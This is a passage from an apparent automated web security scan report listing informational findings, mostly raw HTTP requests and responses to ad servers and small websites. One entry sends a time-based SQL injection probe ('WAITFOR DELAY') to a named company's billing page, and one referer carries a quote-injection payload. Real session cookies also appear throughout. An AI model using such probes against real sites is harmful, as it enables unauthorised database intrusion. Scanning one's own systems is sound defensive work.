GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6773
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 25 Mar 2011 19:13:14 GMT
Expires: Fri, 25 Mar 2011 19:13:14 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
29.3. http://ad.doubleclick.net/adi/huffpost.politics/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Request

GET /adi/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 11077
Date: Sat, 26 Mar 2011 20:36:05 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:05 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
29.4. http://atgincorporated.com/atgmenu_11.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /atgmenu_11.gif

Request

GET /atgmenu_11.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:40 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.5. http://atgincorporated.com/images/atgmenu_11_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_11_hover.gif

Request

GET /images/atgmenu_11_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:42 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.6. http://atgincorporated.com/images/atgmenu_12_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_12_hover.gif

Request

GET /images/atgmenu_12_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:42 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.7. http://atgincorporated.com/images/atgmenu_13_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_13_hover.gif

Request

GET /images/atgmenu_13_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:42 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.8. http://atgincorporated.com/images/atgmenu_14_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_14_hover.gif

Request

GET /images/atgmenu_14_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:43 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.9. http://atgincorporated.com/images/atgmenu_15_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_15_hover.gif

Request

GET /images/atgmenu_15_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:43 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.10. http://atgincorporated.com/images/atgmenu_17_hover.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /images/atgmenu_17_hover.gif

Request

GET /images/atgmenu_17_hover.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:45 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.11. http://atgincorporated.com/qmimages/gradient_11.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /qmimages/gradient_11.gif

Request

GET /qmimages/gradient_11.gif HTTP/1.1
Host: atgincorporated.com
Proxy-Connection: keep-alive
Referer: http://atgincorporated.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCARQDSS=JIKBPNADHLOPKBKJNCLBLDMI

Response

HTTP/1.1 404 Not Found
Content-Length: 1028
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:40 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#97;&#116;&#103;&#105;&#11
...[SNIP]...
29.12. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121423&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301103472597&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103473670&frm=0&adk=3965760877&ga_vid=444046128.1301103474&ga_sid=1301103474&ga_hid=1149958600&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1077&xpc=hYA46mUL3p&p=http%3A//www.soundingsonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1300988408; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:37:08 GMT
Last-Modified: Sat, 26 Mar 2011 01:37:08 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x1, ewr-bidder-x2
Server: MMBD/3.5.0
Content-Length: 1230
Content-Type: text/html
Connection: keep-alive

<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://pixel.mathtag.com/creative/img?mt_adid=70&mt_aid=60843514997508161&mt_e
...[SNIP]...
29.13. http://cloudscan.org/VaUcX/welcome.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.org
Path:   /VaUcX/welcome.html

Request

GET /VaUcX/welcome.html HTTP/1.1
Host: cloudscan.org
Proxy-Connection: keep-alive
Referer: http://cloudscan.org/welcome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>
29.14. http://cloudscan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: cloudscan.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>
29.15. http://cloudscan.org/welcome.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.org
Path:   /welcome.html

Request

GET /welcome.html HTTP/1.1
Host: cloudscan.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>
29.16. http://hbc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hbc.com
Path:   /

Request

GET / HTTP/1.1
Host: hbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://hbc.com/landing.html
Date: Wed, 30 Mar 2011 13:54:42 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 14 Dec 2010 22:07:51 GMT
ETag: "8282cd59db9bcb1:fa4"
Content-Length: 309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script type="text/javascript" src="/header_footer/javascript/en/links.js"></script>
<SCRIPT la
...[SNIP]...
29.17. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/PaymentDetails.asp

Request

GET /billing_view/PaymentDetails.asp?id=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Host: hmficweb.hinghammutual.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:12:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1584
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQDDBBBA=BGAPHEHCPIKOJFKCINJLDINK; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - View Payment Details</TITLE>
</
...[SNIP]...
29.18. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.11407896876335144&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:17 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 537

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
29.19. http://js.adsonar.com/js/pass.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /js/pass.html

Request

GET /js/pass.html?cb=38300 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 23 Nov 2010 14:44:54 GMT
ETag: "5ab-495b96a6f2580"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1451
Content-Type: text/html
Cache-Control: max-age=1743
Expires: Sat, 26 Mar 2011 21:05:19 GMT
Date: Sat, 26 Mar 2011 20:36:16 GMT
Connection: close

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...
29.20. http://music.aol.com/_uac/adpage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /_uac/adpage.html

Request

GET /_uac/adpage.html HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
